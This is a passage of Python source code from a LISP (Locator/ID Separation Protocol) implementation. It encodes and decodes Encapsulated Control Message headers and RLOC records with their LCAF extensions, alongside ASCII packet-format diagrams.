self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsulated Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
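#
# The function below is an illustrative sketch only and is not called by the
# code. It shows how the first long of the ECM header is built, mirroring
# lisp_ecm.encode(): Type=8 occupies the top 4 bits and the S/D/E/M flag bits
# follow. It relies on this module's struct and socket imports.
#
def lisp_example_ecm_first_long(security, ddt, to_etr, to_ms):
    first_long = (LISP_ECM << 28)
    if (security): first_long |= 0x08000000
    if (ddt): first_long |= 0x04000000
    if (to_etr): first_long |= 0x02000000
    if (to_ms): first_long |= 0x01000000
    return(struct.pack("I", socket.htonl(first_long)))
#enddef
#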
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
            self.udp_dport))
    #enddef
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
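# Illustrative sketch only, not called by the code: how the RLOC-record flags
# field is packed, mirroring lisp_rloc_record.encode(). The low three bits are
# the L (local), p (probe), and R (reachable) flags.
#
def lisp_example_rloc_record_flags(local_bit, probe_bit, reach_bit):
    flags = 0
    if (local_bit): flags |= 0x0004
    if (probe_bit): flags |= 0x0002
    if (reach_bit): flags |= 0x0001
    return(socket.htons(flags))
#enddef
#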
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
lcaf_len = socket.htons(len(self.json.json_string) + 2)
json_len = socket.htons(len(self.json.json_string))
jpkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_JSON_TYPE,
0, lcaf_len, json_len)
jpkt += self.json.json_string
jpkt += struct.pack("H", 0)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len])
packet = packet[json_len::]
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
            # Get lisp_keys() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
